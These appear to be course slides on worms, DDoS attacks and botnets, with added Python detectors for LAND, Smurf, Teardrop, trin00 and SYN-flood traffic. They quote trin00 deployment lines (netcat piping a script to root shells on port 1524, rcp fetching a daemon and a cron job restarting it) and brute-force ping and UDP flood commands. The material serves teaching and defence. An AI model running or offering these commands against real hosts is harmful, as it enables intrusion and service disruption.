Worms, DDOS, and Botnets Wide-spread Internet attacks
Worms • Active network propagation • Replicates (like a virus) • Operates independently of users • Compromise remote machines • Insecure services • Copy themselves to that machine
Morris Worm • Released on Nov 2, 1988 • Morris was a Cornell Ph.D. student • Objective • A program to “live” in the Internet • Steps • Determine where to spread • Spread its infection • Remain undiscovered and undiscoverable
Morris Worm • Where to spread • netstat -r -n • /etc/hosts • Yellow pages distributed hosts file • Tries all local addresses
Morris Worm • Security flaws to exploit • Weak password for rsh • Buffer overflow in fingerd program • Trapdoor in sendmail mail handler • DEBUG mode
Morris Worm • Disguise • Remove all the traces from disks • Save all files in memory, encrypted • Change its process name periodically • Oops • sendmail log files • Monitoring • 1/15 chance it sends a byte to a server at Berkeley
Morris Worm • Effects • Resource exhaustion, disconnection, isolation • $10-100M damage • Bug in the worm • Robert? • Tried and convicted of violating the 1986 Computer Fraud and Abuse Act • First conviction! • 3 years probation • 400 hours of community service • $10,000 fine
Code Red • Appeared in the middle of 2001 • On July 19, it infected more than 250,000 systems in nine hours • Infection • Using Microsoft’s Internet Information Server • Using buffer overflows • Propagation • Checks IP addresses on port 80 of the PC to see if the web server is vulnerable
Denial of Service • Loss of “availability” • Regular use is stopped • A more advanced attack • Version 1 is insecure • Version 2 is secure, but backwards compatible • DOS version 2 • Forces people to use version 1 • Attack those people
Old Attacks • Error handling • Failures caused system crashes • Ping of Death • ICMP packets big enough to fragment • Teardrop • Manipulate the offset in fragmented packets • Land Attack • Same source and destination IP address and port
Old Attacks • Looping • Smurf attack • Ping to broadcast address • echo/chargen • Echo is a service that repeats what you send • Chargen is a service that generates characters • A command (spoofed) from the machine with Echo is sent to the chargen service. • Boom!
DoS Attacks • General security principle • Robustness to normal inputs ≠ Robustness to attacks
LAND Attack (diagram) • SYN packet: Source IP 129.107.94.136, Source Port 22, Dest. IP 129.107.94.136, Dest. Port 22 • The host at 129.107.94.136 receives its own SYN and answers with a SYN/ACK to itself
Teardrop Attack • IP fragmentation • Fragment offset • NFB: amount of data in 1st packet • Normal case (diagram): Packet 1: More fragments: 1, Frag. offset: 0; Packet 2: Frag. offset: 0 + NFB
Teardrop Attack • Attack • Simply a bad offset • Diagram: Packet 1: More fragments: 1, Frag. offset: 0; Packet 2: Frag. offset: 2354692110
Smurf Attack • ICMP • Ping • Leverage • Diagram: Ping with Source IP 129.107.94.136 sent to 129.16.33.255 (the broadcast address of 129.16.33.*); every host in 129.16.33.* replies to 129.107.94.136
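The four "Old Attacks" above are all malformed-input failures, so the natural defensive counterpart is a set of sanity checks applied before a packet or fragment set is processed. The following is an added example, not code from the slides: the Packet class and the check functions are hypothetical names, and every packet built in it is a constructed sample using the addresses shown on the slides. It goes slightly beyond the slides by checking both the "huge offset" Teardrop case pictured above and the overlapping-fragment case.

```python
# Added example (not from the slides): defender-side checks for the LAND,
# Smurf, echo/chargen and Teardrop inputs described above. Names are
# hypothetical; all packets are constructed samples.
from dataclasses import dataclass
from typing import List, Optional
import ipaddress

MAX_DATAGRAM = 65535          # largest total length an IPv4 datagram can have (16-bit field)
ECHO_PORT, CHARGEN_PORT = 7, 19


@dataclass
class Packet:
    src_ip: str
    dst_ip: str
    proto: str                       # "tcp", "udp" or "icmp"
    src_port: int = 0
    dst_port: int = 0
    flags: str = ""                  # TCP flags such as "SYN"
    icmp_type: Optional[int] = None  # 8 = echo request
    frag_offset: int = 0             # byte offset of this fragment in the original datagram
    more_fragments: bool = False
    length: int = 0                  # payload bytes carried by this fragment


def is_land(p: Packet) -> bool:
    """LAND: a SYN whose source and destination address and port are identical,
    so the receiver ends up handshaking with itself."""
    return (p.proto == "tcp" and "SYN" in p.flags
            and p.src_ip == p.dst_ip and p.src_port == p.dst_port)


def is_smurf_trigger(p: Packet, local_net: str) -> bool:
    """Smurf: an ICMP echo request aimed at the broadcast address of a local
    network, which would make every host on it reply to the source address."""
    net = ipaddress.ip_network(local_net, strict=False)
    return (p.proto == "icmp" and p.icmp_type == 8
            and ipaddress.ip_address(p.dst_ip) == net.broadcast_address)


def is_echo_chargen_loop(p: Packet) -> bool:
    """echo/chargen: a UDP packet between port 7 and port 19 would bounce
    between the two services indefinitely."""
    return p.proto == "udp" and {p.src_port, p.dst_port} == {ECHO_PORT, CHARGEN_PORT}


def fragment_problems(frags: List[Packet]) -> List[str]:
    """Teardrop: validate the offsets of one datagram's fragments before
    reassembly. Returns one description per bad offset (empty list = sane)."""
    problems = []
    covered_end = 0   # first byte not yet covered by earlier fragments
    for f in sorted(frags, key=lambda f: f.frag_offset):
        end = f.frag_offset + f.length
        if end > MAX_DATAGRAM:
            problems.append(f"offset {f.frag_offset} + {f.length} bytes exceeds the maximum datagram size")
        if f.frag_offset < covered_end:
            problems.append(f"offset {f.frag_offset} overlaps data already covered up to byte {covered_end}")
        covered_end = max(covered_end, end)
    return problems


if __name__ == "__main__":
    # Constructed samples mirroring the slide diagrams.
    land = Packet("129.107.94.136", "129.107.94.136", "tcp", 22, 22, "SYN")
    smurf = Packet("129.107.94.136", "129.16.33.255", "icmp", icmp_type=8)
    teardrop = [Packet("10.0.0.1", "10.0.0.2", "udp", frag_offset=0, more_fragments=True, length=1480),
                Packet("10.0.0.1", "10.0.0.2", "udp", frag_offset=2354692110, length=20)]
    print("LAND:", is_land(land))
    print("Smurf trigger:", is_smurf_trigger(smurf, "129.16.33.0/24"))
    print("Teardrop:", fragment_problems(teardrop))
```

A reassembly routine that rejects a fragment set as soon as `fragment_problems` returns anything avoids the kind of bad-offset arithmetic that crashed the old stacks; the other three checks are cheap enough to run on every packet at a border device.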
Network DOS • ARP attacks • Change the router’s advertised Ethernet address to anything else.
Lessons Learned? • Many equivalent attacks today • Look at CERT alerts • Many are DOS vulnerabilities • Usually software errors • We’re still bad at handling malformed inputs • Unnecessary services • Many have been taken away (generally) • More keep popping up
Flooding • A Classic Attack • Just send traffic: mail bomb, SYN floods, ICMP • Generally works • If you block the bad traffic, I’ll flood the blocker • Need to block it from at least 1 hop away
The Attacker’s Problems • Easily Detectable • IP spoofing? • Works less and less (egress filters) • Partial traceback available • Weak • Amazon.com • Built to handle lots of traffic • One flooder is a blip on the radar
BotNets • Zombies • Many available networked computers • High-speed Internet connections • Automated attacks • No intense firewall hacking • or other dangerous, difficult tasks • Software and OS are homogeneous • 10,000 to 1.5 million
Anatomy of a Zombie • What would you put into a bot? • Infect and spread • Covert • Make money
Anatomy of a Zombie • An Example (from GRC.com, 2001) • rundIl.exe (rundIl.exe -- note the ‘eye’) • Check the font in your Windows registry • Connection • E.g. IRC server • Join a secret, password protected channel • Wait for instructions • Download a trojan • Attack on command • with or without trojan
Anatomy of UNIX Zombies • Linux/Solaris • Many root kits and network sniffers available • Automatically • Scan for vulnerable services • Attempt attacks • Open a port to listen for “owned” machines • (e.g., port 1524 “ingresslock” service) • Alternatively mail to a freemail account • Install attackware on these machines
Sample Connections: Trin00 • This script uses "netcat" ("nc") to pipe a shell script to the root shell listening on, in this case, port 1524/tcp:
------------------------------------------------------------------------
./trin.sh | nc 128.aaa.167.217 1524 &
./trin.sh | nc 128.aaa.167.218 1524 &
./trin.sh | nc 128.aaa.167.219 1524 &
./trin.sh | nc 128.aaa.187.38 1524 &
./trin.sh | nc 128.bbb.2.80 1524 &
./trin.sh | nc 128.bbb.2.81 1524 &
./trin.sh | nc 128.bbb.2.238 1524 &
./trin.sh | nc 128.ccc.12.22 1524 &
./trin.sh | nc 128.ccc.12.50 1524 &
. . .
------------------------------------------------------------------------
Sample Script • The script "trin.sh", whose output is being piped to these systems, looks like:
------------------------------------------------------------------------
# Remote copy of the "leaf" program to an unsuspicious location
echo "rcp 192.168.0.1:leaf /usr/sbin/rpc.listen"
echo "chmod +x /usr/sbin/rpc.listen"      # Make it executable
echo "echo launching trinoo"
echo "/usr/sbin/rpc.listen"               # Run "leaf"
# Set it up as a cron job. Restart it every minute.
echo "echo \* \* \* \* \* /usr/sbin/rpc.listen > cron"
echo "crontab cron"
echo "echo launched"
echo "exit"
Attack Topology (diagram) • Three tiers: Attackers → Masters → Daemons • Labels on the diagram: dns1.uta.edu, www3.security.com, mail.company.com (hosts); sCUdATK, ^^hATEr^^ (attacker handles)
Attack Topology • Master’s Characteristics • Easy to hide • lots of accounts • lots of traffic • Should use a r00t kit to hide your tracks • Important Systems • Sys admin reluctant to take it down • DNS server, mail server, etc.
New Topologies • Trin00 • IRC: No master to catch • Conficker • Rotating Web sites • Storm • Structured P2P
Other Uses of Botnets • Spam • Ad revenue • Phishing & ID theft • Spreading malware • Sell • Compromise machines for others’ use
Script Kiddies • Non-expert Attackers • Trin00 and other DDOS attack tools have well-defined signatures • Fixed port numbers • Fixed & clear-text passwords • Known commands • Crontab entries • File locations • Sys Admins can find these • Experts can avoid them
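The signatures this slide lists (a fixed port, a fixed file location, a crontab entry) are exactly what a sysadmin can check for, and the trin.sh script shown earlier supplies the concrete values: a root shell on port 1524, the daemon copied to /usr/sbin/rpc.listen, and an every-minute cron entry restarting it. The following host check is an added example, not code from the slides or from any trin00 analysis; the crontab and netstat text are constructed samples, and the function names are hypothetical.

```python
# Added example (not from the slides): check a host for the fixed trin00
# indicators the slides give. Sample inputs are constructed; names are
# hypothetical.
import re
from typing import Dict, Iterable, List

# Indicators taken from the trin.sh script and the "Script Kiddies" slide.
TRINOO_PORT = 1524                       # "ingresslock" root shell the handler listens on
TRINOO_PATH = "/usr/sbin/rpc.listen"     # where trin.sh copies the "leaf" daemon

# Five asterisks = run every minute; capture the command that follows.
EVERY_MINUTE = re.compile(r"^\s*\*\s+\*\s+\*\s+\*\s+\*\s+(\S+)")
# `netstat -an` style line: proto, recv-q, send-q, local addr:port, foreign addr, LISTEN
LISTENER = re.compile(r"^(tcp|udp)\S*\s+\d+\s+\d+\s+\S+:(\d+)\s+\S+\s+LISTEN\b")
EXPECTED_DIRS = ("/usr/bin/", "/bin/", "/usr/local/bin/")   # assumption: normal homes for cron commands


def cron_findings(crontab_text: str) -> List[str]:
    """Flag the exact trin00 crontab line, plus any other every-minute job
    that runs something outside the usual system directories."""
    out = []
    for line in crontab_text.splitlines():
        m = EVERY_MINUTE.match(line)
        if not m:
            continue
        cmd = m.group(1)
        if cmd == TRINOO_PATH:
            out.append(f"known trin00 cron entry: {line.strip()}")
        elif not cmd.startswith(EXPECTED_DIRS):
            out.append(f"every-minute job running unusual path: {line.strip()}")
    return out


def listener_findings(netstat_text: str) -> List[str]:
    """Flag a listener on the trin00 port in `netstat -an` style output."""
    out = []
    for line in netstat_text.splitlines():
        m = LISTENER.match(line)
        if m and int(m.group(2)) == TRINOO_PORT:
            out.append(f"listener on port {TRINOO_PORT}: {line.strip()}")
    return out


def file_findings(existing_paths: Iterable[str]) -> List[str]:
    """Flag the daemon's known drop location if it exists on the host."""
    return [f"file present: {TRINOO_PATH}"] if TRINOO_PATH in set(existing_paths) else []


def check_host(crontab_text: str, netstat_text: str, existing_paths: Iterable[str]) -> Dict[str, List[str]]:
    return {
        "cron": cron_findings(crontab_text),
        "listeners": listener_findings(netstat_text),
        "files": file_findings(existing_paths),
    }


# Constructed sample inputs (what `crontab -l`, `netstat -an` and a file
# listing might return on an infected host).
SAMPLE_CRONTAB = """\
# constructed sample crontab
0 3 * * * /usr/bin/updatedb
* * * * * /usr/sbin/rpc.listen
"""
SAMPLE_NETSTAT = """\
Proto Recv-Q Send-Q Local Address           Foreign Address         State
tcp        0      0 0.0.0.0:22              0.0.0.0:*               LISTEN
tcp        0      0 0.0.0.0:1524            0.0.0.0:*               LISTEN
tcp        0      0 10.0.0.5:22             10.0.0.9:51022          ESTABLISHED
"""
SAMPLE_FILES = ["/usr/sbin/rpc.listen", "/usr/sbin/sshd"]

if __name__ == "__main__":
    for category, hits in check_host(SAMPLE_CRONTAB, SAMPLE_NETSTAT, SAMPLE_FILES).items():
        for hit in hits:
            print(f"[{category}] {hit}")
```

On a live host the three inputs would come from `crontab -l` for each user, `netstat -an` and a walk of the filesystem; the point of the slide is that these fixed values are only reliable against the tool as shipped, so the every-minute heuristic is there to catch a variant that changed the path but kept the restart trick.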
Distributed DOS = DDOS • Step 1 • Get as large a botnet as you can • Step 2 • Flood the target full blast from every zombie • IP spoofing? • Yes: harder to trace back • No: could get blocked by egress filters • No: you didn’t hack the boxes directly; hard to trace.
Methods of Blasting 1 • Brute Force • ping.exe 127.10.10.1 -l 65500 -n 10000 • Send 10K large pings • udp 127.10.10.1 9999999 0 • This sends huge packets, no delay • 1500-byte fragments result • Characteristics • These can be run on Windows cmd line • Pure brute force bandwidth consumption
Real World DDoS
0.224610 119.226.89.96 -> victim TCP 33081 > 60785 [SYN] Seq=3693150756 Ack=0 Win=32768 Len=0
0.224610 victim -> 223.144.66.65 TCP 52284 > 19586 [RST, ACK] Seq=0 Ack=423694111 Win=0 Len=0
0.224610 3.41.60.116 -> victim TCP 5594 > 40940 [SYN] Seq=2132997225 Ack=0 Win=32768 Len=0
0.224610 victim -> 50.180.94.71 TCP 33289 > 11952 [RST, ACK] Seq=0 Ack=1790973261 Win=0 Len=0
0.224610 244.214.39.108 -> victim TCP 38802 > 23759 [SYN] Seq=747020069 Ack=0 Win=32768 Len=0
0.224610 victim -> 198.183.172.81 TCP 57223 > 43146 [RST, ACK] Seq=0 Ack=3749566807 Win=0 Len=0
0.224610 64.81.138.119 -> victim UDP Source port: 1026 Destination port: 24661
0.224610 victim -> 96.247.9.94 TCP 48931 > 50749 [RST, ACK] Seq=0 Ack=1188357973 Win=0 Len=0
0.224610 103.227.64.42 -> victim TCP 45715 > 63366 [] Seq=3389528594 Ack=0 Win=16384 Len=0
0.224610 victim -> 211.107.218.23 TCP 12666 > 48183 [RST, ACK] Seq=0 Ack=2803931407 Win=0 Len=0
0.224610 87.29.46.64 -> victim TCP 17092 > 47365 [SYN] Seq=3446572548 Ack=0 Win=32768 Len=0
0.224610 victim -> 58.24.148.57 TCP 26667 > 9797 [RST, ACK] Seq=0 Ack=3710546447 Win=0 Len=0
0.224610 8.116.40.43 -> victim TCP 38367 > 32889 [SYN] Seq=1914703987 Ack=0 Win=32768 Len=0
0.225448 victim -> 68.132.173.125 TCP 64470 > 35524 [RST, ACK] Seq=0 Ack=1819819023 Win=0 Len=0
0.225448 75.115.186.26 -> victim TCP 4082 > 29772 [SYN] Seq=4245878839 Ack=0 Win=32768 Len=0
Methods of Blasting 2 • TCP 3-way handshake (diagram) • Client → Server: SYN=1, seq=963 • Server moves from LISTEN to SYN_RCVD and replies: SYN=1, seq=382, ack=964 • Client → Server: SYN=0, seq=964, ack=383 • Server state: ESTAB.
Methods of Blasting 2 • TCP 3-way handshake under a SYN flood (diagram) • Server starts in LISTEN • Five SYNs arrive (SYN=1, seq=963, five times) • Server enters SYN_RCVD for each and sends five replies: SYN=1, seq=382, ack=964 • No third-step ACK ever comes back, so all five half-open entries stay in SYN_RCVD
Methods of Blasting 2 • Server • Enters the SYN_RCVD state • Limited # of connections allowed • Legit users can’t connect • Fix 1: allow more connections • Attack on Fix 1: Memory, processing, and bandwidth • Syn Flood • Open a TCP connection (SYN) • Don’t respond to the SYN/ACK • Repeat!
Methods of Blasting 2 • Advantages • Less cost than brute force • Can look the same as legit traffic • Disadvantage • SYN/ACK traffic comes back • Unless spoofed IP • But far less than sent, on average
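The capture on the "Real World DDoS" slide is the kind of evidence a defender actually has, and the SYN flood slides tell you what to look for in it: SYNs that are never followed by the third-step ACK. The following parser and summary are an added example, not code from the slides; CAPTURE is the slide's own packet listing embedded verbatim so the example runs offline, and the function names and the thresholds (five SYNs, 90% half-open) are assumptions.

```python
# Added example (not from the slides): parse the tshark-style lines of the
# "Real World DDoS" slide and count inbound SYNs never completed by an ACK.
# Function names and thresholds are hypothetical.
import re
from typing import Dict, List

# The packet lines from the slide, verbatim. "victim" is the slide's own
# placeholder for the target address.
CAPTURE = """\
0.224610 119.226.89.96 -> victim TCP 33081 > 60785 [SYN] Seq=3693150756 Ack=0 Win=32768 Len=0
0.224610 victim -> 223.144.66.65 TCP 52284 > 19586 [RST, ACK] Seq=0 Ack=423694111 Win=0 Len=0
0.224610 3.41.60.116 -> victim TCP 5594 > 40940 [SYN] Seq=2132997225 Ack=0 Win=32768 Len=0
0.224610 victim -> 50.180.94.71 TCP 33289 > 11952 [RST, ACK] Seq=0 Ack=1790973261 Win=0 Len=0
0.224610 244.214.39.108 -> victim TCP 38802 > 23759 [SYN] Seq=747020069 Ack=0 Win=32768 Len=0
0.224610 victim -> 198.183.172.81 TCP 57223 > 43146 [RST, ACK] Seq=0 Ack=3749566807 Win=0 Len=0
0.224610 64.81.138.119 -> victim UDP Source port: 1026 Destination port: 24661
0.224610 victim -> 96.247.9.94 TCP 48931 > 50749 [RST, ACK] Seq=0 Ack=1188357973 Win=0 Len=0
0.224610 103.227.64.42 -> victim TCP 45715 > 63366 [] Seq=3389528594 Ack=0 Win=16384 Len=0
0.224610 victim -> 211.107.218.23 TCP 12666 > 48183 [RST, ACK] Seq=0 Ack=2803931407 Win=0 Len=0
0.224610 87.29.46.64 -> victim TCP 17092 > 47365 [SYN] Seq=3446572548 Ack=0 Win=32768 Len=0
0.224610 victim -> 58.24.148.57 TCP 26667 > 9797 [RST, ACK] Seq=0 Ack=3710546447 Win=0 Len=0
0.224610 8.116.40.43 -> victim TCP 38367 > 32889 [SYN] Seq=1914703987 Ack=0 Win=32768 Len=0
0.225448 victim -> 68.132.173.125 TCP 64470 > 35524 [RST, ACK] Seq=0 Ack=1819819023 Win=0 Len=0
0.225448 75.115.186.26 -> victim TCP 4082 > 29772 [SYN] Seq=4245878839 Ack=0 Win=32768 Len=0
"""

LINE = re.compile(r"^(?P<t>\d+\.\d+)\s+(?P<src>\S+)\s+->\s+(?P<dst>\S+)\s+(?P<proto>TCP|UDP)\s+(?P<rest>.*)$")
TCP_REST = re.compile(r"(?P<sport>\d+)\s+>\s+(?P<dport>\d+)\s+\[(?P<flags>[^\]]*)\]")
UDP_REST = re.compile(r"Source port:\s*(?P<sport>\d+)\s+Destination port:\s*(?P<dport>\d+)")

MIN_SYNS = 5               # assumption: below this, do not bother judging
MIN_HALF_OPEN_RATIO = 0.9  # assumption: share of SYNs with no completing ACK


def parse_capture(text: str) -> List[Dict]:
    """Turn each capture line into a dict; TCP flags become a set (empty for '[]')."""
    pkts = []
    for line in text.splitlines():
        m = LINE.match(line)
        if not m:
            continue
        rec = {"t": float(m["t"]), "src": m["src"], "dst": m["dst"], "proto": m["proto"], "flags": set()}
        if m["proto"] == "TCP":
            tm = TCP_REST.search(m["rest"])
            rec["sport"], rec["dport"] = int(tm["sport"]), int(tm["dport"])
            rec["flags"] = {f.strip() for f in tm["flags"].split(",") if f.strip()}
        else:
            um = UDP_REST.search(m["rest"])
            rec["sport"], rec["dport"] = int(um["sport"]), int(um["dport"])
        pkts.append(rec)
    return pkts


def syn_flood_summary(pkts: List[Dict], victim: str = "victim") -> Dict:
    """Count inbound SYNs and how many of their sources never sent the third-step ACK."""
    inbound = [p for p in pkts if p["dst"] == victim]
    syns = [p for p in inbound if p["proto"] == "TCP" and p["flags"] == {"SYN"}]
    # A source that ever sends a plain ACK (no SYN) to the victim finished the
    # handshake; a flooder's sources never do, which is the tell on the slide.
    completed = {p["src"] for p in inbound
                 if p["proto"] == "TCP" and "ACK" in p["flags"] and "SYN" not in p["flags"]}
    half_open = [p for p in syns if p["src"] not in completed]
    span = pkts[-1]["t"] - pkts[0]["t"] if len(pkts) > 1 else 0.0
    ratio = len(half_open) / len(syns) if syns else 0.0
    return {
        "inbound": len(inbound),
        "syn": len(syns),
        "half_open": len(half_open),
        "distinct_syn_sources": len({p["src"] for p in syns}),
        "udp": sum(p["proto"] == "UDP" for p in inbound),
        "null_flags": sum(p["proto"] == "TCP" and not p["flags"] for p in inbound),
        "rst_ack_out": sum(p["src"] == victim and p["flags"] == {"RST", "ACK"} for p in pkts),
        "syns_per_second": len(syns) / span if span > 0 else float("inf"),
        "suspicious": len(syns) >= MIN_SYNS and ratio >= MIN_HALF_OPEN_RATIO,
    }


if __name__ == "__main__":
    for k, v in syn_flood_summary(parse_capture(CAPTURE)).items():
        print(f"{k}: {v}")
```

On the slide's own data every one of the six inbound SYNs comes from a different source and none is ever completed, which is the "can look the same as legit traffic" problem from the slide above turned around: individually each SYN is legitimate, and only the aggregate (many sources, no completions, a very high SYN rate in a window under a millisecond) gives it away.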
Making $$DDOS$$ Pay • No big targets • Publicity is good marketing but bad for avoiding arrest • Easier to take small targets down • Advertise • Company B would pay to have Company A’s website go down • Extortion: pay us or else
Defenses • Filtering - how • SYN floods: check for repeated IPs • Often non-production ports • Only allow specific forms of UDP • Expensive • $12K/Mo. • Network response can drop by several seconds • Pay the Extortion fees
Detecting DoS Attacks • Not immediate • Network failure • Slashdot effect • Easy to hide • Use spoofed IP packets and reflection • How do we find these attackers?
Mafiaboy • 2000: Amazon, Dell, eBay • http://www.ecommercetimes.com/perl/story/3044.html “The teen hacker apparently made himself easy to find. He reportedly used an ISP that tracked his activities and made boastful claims -- including information only the hacker would know -- in Internet chat rooms.” • http://www.zdnet.com/zdnn/stories/news/0,4586,2552467,00.html But in what could be a warning to Web sites, authorities said the hacker was not especially skilled technically, yet he was able to cripple a handful of prominent Web sites. “He had a good knowledge of computers, but he was not what we would call a genius” said Staff Sergeant Jean-Pierre Roy of the Royal Canadian Mounted Police (RCMP) during a news conference Wednesday.
Trapdoors • Examples • Special account to avoid password • Special sequence to avoid access control • Cause of trapdoors • Forgotten • Intentionally left in the program for testing • Intentionally left for maintenance • Intentionally left as a covert means of access to the component
Rootkits and Backdoors • Backdoor: an open passage into a system • Ex: A root shell listening on a high port • Usually, it is disguised in some fashion. • Rootkit: a complete backdoor system • used to hide one or more backdoors • modify system logs, binaries, etc., to hide its presence.